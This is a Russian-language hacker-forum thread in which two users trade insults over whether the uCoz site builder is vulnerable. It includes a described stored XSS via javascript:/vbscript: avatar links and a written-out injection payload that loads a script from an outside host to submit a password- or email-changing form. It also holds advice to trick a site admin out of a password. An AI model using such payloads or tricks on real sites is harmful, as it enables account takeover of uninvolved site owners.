ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Jah, наркоман?) Эти домены просто прикручены - движок там юкоза)

__________________
Фреймворк для спамера :(
Услуги программирования

3dn
Чё за ламос очередной=)))
Если сказал, что уязвимость в профайле именно в GET значит так и есть.
Давай я продемонстрирую XSS урле...и ты признаешь что ты ламо!-))))
бггггггггг


3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).

"по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели..."
Internet Explorer <=7.0 допотопные браузеры да?
бггг посмеялся спасибо.
читай ламос: http://kodsweb.ru/texts/ie_graphics_xss.txt

и ещё нечего для тебя я взламывать не собираюсь и не потому, что ты ламос а потому что все Белошляпники рулят...всем вайт-хэдам респект!

давай если ты продемонстрируешь XSS, который куки выдергивает внедренный в сайт на укозе. Внедрить XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь... А если у тебя ума хватает только на то, чтобы в простом URL еще и скрит прописать, то этим только ламаки могут хвастать.... Внедрить такой урл в сайт нужно, а не уметь его составлять....

мало того что ты не сможешь, из-за ограниченности своего ума внедрить в бинарный файл яваскрипт, так ты еще и берешься утверждать что эта дыра работает в современных браузерах.... и даже в 7 версии ИЕ.... похоже твои мозги слабо осознают всю проблему подобной дыры и если бы она была, а она действительно была года 3 назад, то людям работающим с троянами жизнь малиной бы показалась....

слова лузера, который может только языком трепать..... у тебя мозгов не хватит чтобы сайт на юкозе взломать, где так много дыр, по твоим словам.....

Итак устал веселиться=))))
давай объективно:
что ты хочешь, чтобы я нашёл активную XSS на юкозе?
может как нить займусь, может найду а может и нет.
"XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь"

Извини парень давай без оскарблений но ты рельно не понимаешь вообще о чём я.
Я не писал про добавления скриптов с помощью разрешённых html.
Выше я писал про автоформы...ты в курсе, что это?
если нет спроси у кого нить.

Почему не могу...я имел ввиду про уязвимость класса Пассивиная Xss для браузера IE методом обхода граффического фильтра.
Дырка это работает как простая пассивная XSS для браузеров IE.
Проверенно на разных web приложениях.
Лучше почитай тут, уже писал:
http://forum.antichat.ru/threadedpost222134.html#post222134

"людям работающим с троянами жизнь малиной бы показалась"
а это к чему?
или ты опять меня не понял или ты вообще не в теме

Ну ё моё чё ты меня оскарбляешь?
ты меня не знаешь и я тебя незнаю,
приёму любую объективную критику, но не надо по киддисовски общаться я так не привык.
я просто уверен в сырости юкоза.
Если потестить оч. хорошо то найти можно много, наверняка.
Вмес то того, чтобы непонимать о чём я пишу и поносить меня сам бы протестил юкоз=)

да ты хохмач..... надо же такой умный, ломай говорит... это все сайты в системе юкоз, а если бы поумнее немного был, то смог бы подумать, что сервер не 1 и айпи у юкоза не один, а значит и доменов бы больше нашел.

p0.ru - а это вообще один из доменов укоза, также как и clan.su, my1.ru и т.д.

смотрю тут из советчиков одни детки сидят, которые не способны даже на главную страницу укоза зайти и посмотреть на сайты в колонке слева и текст почитать, чтобы понять что такое укоз.... но советы по взлому давать горазды.

вам только сайты на народе ломать и пхп нюку по уже известным дырам.

HOT, хочешь взломать, разводи админа сайта на пароль хитростями.... совет по взлому самой системы ты тут на найдешь, не тот уровень здешних хацкеров, чтобы предложить что-то достойное, они даже с укозом не знакомы.... а как можно взломать то, в чем не разбираешься???

__XT__, оказывается слова "Чё за ламос очередной=)))" это не оскорбление.... ну тогда мои слова в твой адрес тоже нельзя считать оскорблениями.

я комментировал все что ты писал и четко отвечал по каждому пункту, поэтому не нужно говорить что ты писал, а что не писал.... Про автоформы я тоже тебе ответил.... если ты этого не заметил, то прошу перечитай мои предыдущие посты. Мало того что на укозе все значимые посты и геты передаются с сессией, а значит автоформу сделать не так уж просто, так еще и через сайт админа назначить невозможно, только через панель, а для нее автоформы вообще не работают.

о том что ты даже понятия не имеешь кто я такой нужно было перед своими высказываниями и оскорблениями подумать....
так вот для начала потестить нужно, а потом заявлять о сырости....

как же ты про объективность можешь говорить если все твои заявления и оскорбления далеки от объективности....

на все твои замечания и утверждения я дал четкие ответы и объяснил почему ни один из твоих способов взлома сайта на юкозе не сработает, нужно внимательнее читать то, что я пишу.... а не зная юкоз как бы я делал эти комментарии?

в отличае от тебя я не делаю голословных заявлений типа что юкоз дырявый или сырой... я говорю как есть и аргументирую почему это именно так....

я заявляю, что взломать юкоз и получить пароль от сайта на юкозе у тебя не выйдет не важно как бы досконально ты его не копал....

ПОсматори, я тебе не чего не писал..ты первый отпостил мне с оскарблеиями на что я ответил.

А что мне думмать.Кто ты такой?
Странно когда я знакомился с организатором
хак-сцены Хаоса
он мне такого не говорил...товарищ не держал марку великого хакера=-))))
(Аггр если увидишь не смеяться=) )

а почему не заявить? или на античате только по факту уязви мости пишут...тут в первую очередь идёт обсуждения те х или иных пролблем..даже преждевременно=)



1)я тебя первый не оскорблял.
2)заявления старался писать объективно


Почему не выдет?
ты так уверен в моём ламеризме=?
ну если тебе легче будет я ламос-)
я просто прикалываюсь что я хакер любительского уровня=)))


Ну видать плохо знаешь.
автоформы там реально сделать.
Xss там хватает.
пхп-инъекций я дум маю найти там не реально=_)


Знаешь честно сказат ьвыражения тупое-=)
ты уверен что Юкоз защищённый?
А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=)
Как говорил Декан кафедры Информационной Безопасноти Питерского ПОлитеха
"Безопасность - это процесс..."
...лан парень ты вмето того, чтобы отписывать мне наборы слов, лучшеб показал мне чё нить интересное на юкозе какие нить уязвимости=)))

перед сном глянул юкоз чуток...на пассивные уязвимости.

По поводу активной XSS:
плохая фильтрация
в профайле в поле ссылки на аватуру.
Можно выполнить експлутировать скрипт
javascript: анти-киддис-бгг
vbscript: анти-киддис-бгг

(кстати неплохая активка получилась...
везде где светим аватар везде XSS)

по поводу пассивных их там оч. много.
Ну вот одна просто самая близкая, роли она практически не играет однако как пример,
что XSS там есть сойдёт=)
http://mirinet.narod.ru/ucoz_passiv.html

По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера.
Понял, что можно експлуатировать наиболее удачную пассивную XSS
и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
т.к. запрос будет от юкоза=)

По поводу уязвимостей более серьёзных:
было пару подозрений на sql-inj.

всем приятных снов и пока!

факт не нужно доказывать, если взломаешь, то факты будут у тебя, а пока система не взломана, то фактами располагаю я.

дай ка ссылку где ты в аватару на юкозе смог XSS засунуть. а то говорить ты горазд, это очень заментно.

очень много от тебя никто не просит, покажи ОДНУ.

ты даже не знаешь что пароль и мыло меняются при редактировании профиля.... если бы знал то так бы и сказал, а не разделял эти два понятия. Так вот, мало того что там реферер проверяется, там еще и айди сессии проверяется, а это значит что твоя автоформа не сработает....

ты вообще разбираешься в веб=технологиях или пишешь то что сам можешь придумать? подменить реферер можно только сервер сайд скриптом, которым весь запрос формируешь.... а если подключать яваскрипт или что угодно еще, реферер браузер сам формирует, и значит подделать его не выйдет.

чудо, ты хоть понимаешь что, для того чтобы делать SQL инъекции нужно знать структуру базы, название полей и т.д., а для этого нужно исходники изучать....

Твой каждый пост только показывает всю твою малограмотность в веб-технологиях.

Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет....

Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат.